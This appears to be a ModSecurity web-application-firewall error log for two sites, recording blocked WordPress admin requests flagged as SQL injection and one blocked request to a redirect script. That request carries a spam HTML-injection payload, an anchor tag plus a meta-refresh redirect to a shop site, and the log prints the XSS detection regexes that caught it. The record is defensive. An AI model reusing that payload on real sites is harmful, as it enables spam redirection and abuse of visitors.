[Mon May 11 18:34:06.128263 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE_UWKUxpmnkK7zHysPQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:06.618860 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE_kWKUxpmnkK7zHysPwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:06.619146 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE_kWKUxpmnkK7zHysPwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:07.223076 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE_kWKUxpmnkK7zHysPwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:07.492619 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE_0WKUxpmnkK7zHysQQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:07.493050 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE_0WKUxpmnkK7zHysQQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:08.085251 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE_0WKUxpmnkK7zHysQQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:08.587174 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFAEWKUxpmnkK7zHysQwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:08.587473 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFAEWKUxpmnkK7zHysQwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:09.168930 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.171646 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.172962 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.174226 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.175846 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.176426 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.177113 2026] [security2:error] [pid 1411201:tid 1411246] [client 27.78.84.116:56813] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFAfy_GXSWIKeli0sgLwAAAIA"]
[Mon May 11 18:34:09.186052 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFAEWKUxpmnkK7zHysQwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:09.472975 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFAUWKUxpmnkK7zHysRAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:09.473338 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFAUWKUxpmnkK7zHysRAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.089194 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFAUWKUxpmnkK7zHysRAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.187976 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFAkWKUxpmnkK7zHysRgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.188412 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFAkWKUxpmnkK7zHysRgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.733638 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFAkWKUxpmnkK7zHysRgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.897182 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFAkWKUxpmnkK7zHysRwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:10.897492 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFAkWKUxpmnkK7zHysRwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:11.300471 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFAkWKUxpmnkK7zHysRwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:11.705789 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFA0WKUxpmnkK7zHysSQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:11.706097 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFA0WKUxpmnkK7zHysSQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:12.307391 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFA0WKUxpmnkK7zHysSQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:12.606064 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFBEWKUxpmnkK7zHysSgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:12.606376 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFBEWKUxpmnkK7zHysSgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:13.263009 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFBEWKUxpmnkK7zHysSgAAARM"], referer: https://rentparadise.fr/wp-login.php
